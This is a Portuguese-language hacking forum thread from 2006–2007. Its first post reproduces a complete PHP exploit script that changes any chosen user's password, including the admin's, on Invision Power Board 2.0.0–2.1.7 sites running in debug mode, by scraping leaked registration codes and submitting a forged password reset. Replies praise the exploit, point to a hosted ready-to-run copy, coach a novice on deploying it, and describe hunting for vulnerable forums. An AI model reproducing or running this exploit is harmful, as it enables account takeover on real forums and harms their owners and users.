Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit

Started by insanity, 01 de November , 2006, 02:31:16 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

insanity

01 de November , 2006, 02:31:16 PM
Code Select
<?php
/*

 Debug Mode password change vulnerability
 Affects Invision Power Borard 2&#46;0&#46;0 to 2&#46;1&#46;7
 by Rapigator
 
 This works if&#58;

 "Debug Level" is set to 3
 or
 Enable SQL Debug Mode is turned on
 
 In General Configuration of the forum software&#46;

*/

// The forum's address up to and including 'index&#46;php'
$site "http&#58;//localhost/forums/index&#46;php";

// An existing user's login name
$name "admin";

// The new password(3-32 characters)
$pass "1234";

// You can use a proxy&#46;&#46;&#46;
// $proxy = "1&#46;2&#46;3&#46;4&#58;8080";



// -----------------------------
$site &#46;= "?";
$suffix "";
$name urlencode($name);
$pass urlencode($pass);
$curl curl_init($site&#46;'act=Reg&CODE=10');
curl_setopt($curlCURLOPT_PROXY$proxy);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_TIMEOUT10);
$page curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w&#93;*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w&#93;{32}?)\',([\\d&#93;*?),/'$page$regs)) {
 $prefix $regs[1&#93;;
 $regid $regs[2&#93;;
 $regcode $regs[3&#93;;
} else {
 $suffix "&debug=1";
 $curl curl_init($site&#46;'act=Reg&CODE=10'&#46;$suffix);
 curl_setopt($curlCURLOPT_PROXY$proxy);
 curl_setopt($curlCURLOPT_RETURNTRANSFER1);
 curl_setopt($curlCURLOPT_TIMEOUT10);
 $page curl_exec($curl);
 curl_close($curl);
 if (preg_match('/INSERT INTO ([\\w&#93;*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w&#93;{32}?)\',([\\d&#93;*?),/'$page$regs)) {
 $prefix $regs[1&#93;;
 $regid $regs[2&#93;;
 $regcode $regs[3&#93;;
 }
}
if (!isset($regid) || !isset($regcode)) {
 echo "Error&#58; Probably not vulnerable, or no forum found";
 exit;
}

$curl curl_init($site&#46;$suffix);
curl_setopt($curlCURLOPT_PROXY$proxy);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_POST1);
curl_setopt($curlCURLOPT_POSTFIELDS"act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curlCURLOPT_TIMEOUT10);
$page curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'&#46;$prefix&#46;'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w&#93;{32}?)\',([\\d&#93;{1,32}?),/', $page, $regs)) {
 change_pass($regcode,$regid,$regs[1&#93;,$regs[2&#93;);
}
if (preg_match('/INSERT INTO '&#46;$prefix&#46;'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w&#93;{32}?)\',([\\d&#93;{1,32}?),/', $page, $regs)) {
 change_pass($regcode,$regid,$regs[1&#93;,$regs[2&#93;);
}

function change_pass($regcode,$regid,$vid,$userid) {
 global $site$proxy$name$pass;
 $curl curl_init($site&#46;$suffix);
 curl_setopt($curlCURLOPT_PROXY$proxy);
 curl_setopt($curlCURLOPT_RETURNTRANSFER1);
 curl_setopt($curlCURLOPT_POST1);
 curl_setopt($curlCURLOPT_POSTFIELDS"act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
 curl_setopt($curlCURLOPT_TIMEOUT10);
 $page curl_exec($curl);
 curl_close($curl);
 echo "Password Changed!";
 exit;
}
?>

# milw0rm.com [2006-11-01]

Fvox

#1
11 de November , 2006, 02:51:42 PM
Muito bom kra!

O wuefez tinha me passado jah o link do site:
http://www.runescapebr.com/ipb.php


mas nem sei se ele tinha a source
"Achas que estás caindo na insanidade? Mergulhe."

RT

#4
13 de December , 2006, 02:42:43 AM
Realmente, muito bom mesmo..
Boa insanity  ;D


RT; 8)

TEAM

#5
08 de January , 2007, 11:27:03 PM
cara sako nada disso mais to querendo aprende onde eu coloko esse codigo tem que baixa algo?

Sladrak

#6
09 de January , 2007, 12:48:07 AM
Quote from: "TEAM"cara sako nada disso mais to querendo aprende onde eu coloko esse codigo tem que baixa algo?

Se vc entrar neste site http://www.runescapebr.com/ipb.php terá o exploit pronto para ser usado, como disse nosso amigo Fvox e Wufez.
Mas para coloca-lo funcionando vc teria que hospeda-lo em um servidor que desse suporte a PHP...

TEAM

#7
09 de January , 2007, 12:54:20 AM
ah.. se eu achar algum host para hospedar http://www.runescapebr.com/ipb.php

eu hosteio e tal ai e so colokar a url  do site dps o login dps a senha??

Mas e esse codigo que o cara passou ai?
ta dentro desse site?

fast

#8
23 de January , 2007, 05:41:19 AM
nao consegui axar NENHUM site vul :S , procurei bastante..
RootDamages = FasT
FasT = RootDamages

o grupo eh soh eu , nao tem otros integrantes !! , portanto nao eh bem um grupo aiheoaihoa

Anonymous

#9
03 de February , 2007, 10:04:42 PM Last Edit: 03 de February , 2007, 10:20:59 PM by DarkGenesis
Good Topic^^ :)
Print
Go Up Pages1
User actions